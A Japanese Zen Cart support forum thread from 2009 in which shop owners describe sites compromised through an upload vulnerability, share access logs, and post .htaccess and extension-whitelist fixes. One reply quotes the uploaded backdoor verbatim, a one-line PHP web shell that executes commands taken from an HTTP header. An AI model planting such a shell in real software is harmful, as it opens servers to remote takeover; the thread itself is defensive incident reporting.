[ハッキング]やられてしまいました・・orz

上記のジャンルにあてはまらない話題、雑談など
アバター
200bpm
記事: 4
登録日時: 2009/7/07 13:57

[ハッキング]やられてしまいました・・orz

投稿記事by 200bpm » 2009/7/07 14:03

ZencartのID/パスワードを安易にadmin/ドメインのアカウントにしていたら、悪意のあるユーザーに
(恐らく)ログインされてバックドアを仕込んだPHPファイルをアップロードされてしまいました。

それか直接classディレクトリのupload.phpを叩かれたっぽいです。。。
サーバーのバックアップを取っていたら偶然にウイルスチェックにひっかかって発見されました。

皆さんもお気をつけくださいませ・・・。

アップされたファイルは下記のようなものです。
PHPファイルなんでアップしない限りは大丈夫ですが興味のある人はどうぞ・・
パスかけてあります。
-URL削除(悪用されそうなので、削除しました・・すいません)

危ないようであれば削除します。
アバター
ゲスト

Re: [ハッキング]やられてしまいました・・orz

投稿記事by ゲスト » 2009/7/09 09:02

200bpm さんが書きました:ZencartのID/パスワードを安易にadmin/ドメインのアカウントにしていたら、悪意のあるユーザーに
(恐らく)ログインされてバックドアを仕込んだPHPファイルをアップロードされてしまいました。

それか直接classディレクトリのupload.phpを叩かれたっぽいです。。。
サーバーのバックアップを取っていたら偶然にウイルスチェックにひっかかって発見されました。

皆さんもお気をつけくださいませ・・・。

直接叩かれても通常であればアップロードは出来ないはずなので恐らくは予測しやすいパスにしていたのが原因だと思いますが、管理画面側のuploadはデフォルトの$extensionsが定義されていないので好きなファイルがアップロードできます。
/includes/classes/upload.php
に記述してある

コード: 全て選択

      if (!defined(UPLOAD_FILENAME_EXTENSIONS)) define ('UPLOAD_FILENAME_EXTENSIONS','jpg,jpeg,gif,png,eps,cdr,ai,pdf,tif,tiff,bmp,zip');
      $extensions=explode(" ",preg_replace('/[.,;\s]+/',' ',UPLOAD_FILENAME_EXTENSIONS));
    }

辺りを参考にして管理画面側でもアップロードできる拡張子を制限して置いたほうが良いでしょうね
アバター
佐々木2号
記事: 231
登録日時: 2005/5/23 13:26
お住まい: 広島県福山市
連絡を取る:

Re: [ハッキング]やられてしまいました・・orz

投稿記事by 佐々木2号 » 2009/7/14 21:33

佐々木2号です。

こちらの被害は下記でアナウンスした脆弱性をついた攻撃によるものと思われます。
viewtopic.php?f=1&t=4586

攻撃を防ぐ為の至急の対応策とZenCart.JPとしてセキュリティーアップデートのリリースに関するアナウンスを追加いたしましたのでご確認ください。
リキッドシステムテクノロジー株式会社
http://www.liquidst.jp
アバター
200bpm
記事: 4
登録日時: 2009/7/07 13:57

Re: [ハッキング]やられてしまいました・・orz

投稿記事by 200bpm » 2009/7/16 15:18

ゲストさん、佐々木さん返信どうもです :D

ゲストさんの言う箇所はどうやら管理画面の設定側で決められた拡張子以外の
ファイルはアップロードしないようにするー・・という、設定部分があったのですが
設定されているのにもかかわらずPHPファイルがimagesディレクトリにアップされていました。orz

佐々木さんの紹介していただいたトピを参照して対策してみたいと思います。 :)
次からは、adminディレクトリの名前とIDとパスをもっと複雑な物にするようにします(^^;
今現在は取り急ぎ、Zencartのルートディレクトリへの海外からのアクセスを全て拒否しました。(htaccessで)
例:
order deny,allow
deny from all
allow from .jp
allow from .bbtec.net # Yahoo BB は許可
allow from .il24.net # Interlink は許可

で、パーミッション666のディレクトリを反映に更新が無い場所は、444などにしました。

ちなみに現在1サーバー内に、Zencart1.2?1.3系が5つ入っているのですが
全てにおいて、被害を受けました・・・(ノД`)
またZencartとは関係ないですが、OpenPNEのキャッシュフォルダにも同様の
被害がみられました。。。

念のためサーバー全てのファイルを検索してファイルを削除しました。
他ウイルスチェックもしましたが特に異常はないようでした。

ちなみにアタックを受けた後html_includesなどのディレクトリに以下のような
ファイルが紛れ込んでいます。
http://style001.at.infoseek.co.jp/zen/yarareta.gif

中身はこんな感じ :(
http://style001.at.infoseek.co.jp/zen/nakami.gif
アバター
@電材
記事: 157
登録日時: 2009/7/11 00:56
お住まい: 大阪府
連絡を取る:

Re: [ハッキング]やられてしまいました・・orz

投稿記事by @電材 » 2009/7/24 22:27

うちも同様にアップロードされて、今日対処したばかりです;
揚げられたファイルは所有者がroot ではなく、パーミッションの変更も削除も出来ず、結局レンタルサーバー運営の方にパーミッションの変更をお願いし、削除しました。

多分、エラーのリクエストを乗っ取るようなプログラムみたいなのと、ワームとトロイの詰め合わせでした。

etc/passwd・・・にアクセスしているログを見かけ、ファイルのバックアップを取ってチェックをかけたらウィルスだらけで・・・

とんだ中元でした。ほんと怖いですね。気をつけましょう。
単なる趣味のサイトhttp://zairyo.ne.jp
アバター
テレーズ

Re: [ハッキング]やられてしまいました・・orz

投稿記事by テレーズ » 2009/8/13 22:54

私の所でも、7月25日に攻撃を受けていた形跡が見つかりました。
アクセスログから分かったことは下記の通りです。

IP アドレス: 188.54.78.63
プロバイダ: SaudiNet, Saudi Telecom Company
アクセス地点: サウジアラビア王国マッカ州ジッダ市近郊
リファラ: http://www.google.com/search?q=Powered+ ... rt=30&sa=N
ブラウザ: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)、Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
攻撃対象: record_company.php、password_forgotten.php

攻撃の結果、images ディレクトリにランダムな名称の php ファイルが1つだけアップロードされており、中身は次のようなものでした。

コード: 全て選択

<?php system($_SERVER["HTTP_SHELL"]); ?>
恐らく、Zen Cart 1.3.8 Remote Code Execution のコードをそのまま実行したものと思われます。

このアップロードされたファイルにも、3秒間隔で7回ほどアクセスした形跡がありましたが、サーバー側でエラーを返した為か、その後の攻撃はありませんでした。

事前対策としては、admin ディレクトリ内の .htaccess ファイルに、

コード: 全て選択

Order Deny,Allow
Deny from all
Allow from IPアドレス
と追記していましたが、.htaccess と同一階層にあるファイルには効果が無かった為に発生した問題であることも分かりました。

事後対策として、ディレクトリ名の変更、セキュリティーパッチの適用、.htaccess ファイルの内容変更を行いました。

コード: 全て選択

<Files *.php>
Order Deny,Allow
Deny from all
Allow from IPアドレス
</Files>
アバター
sirisha
記事: 1
登録日時: 2018/3/08 00:51
連絡を取る:

[ハッキング]やられてしまいました・・orz

投稿記事by sirisha » 2018/3/08 00:59

hello friends,
I am not from coding background, so how could i protect my credentials from being malfunctioned. Could you please suggest some tips.

“Zen Cart 雑談処「禅亭」” へ戻る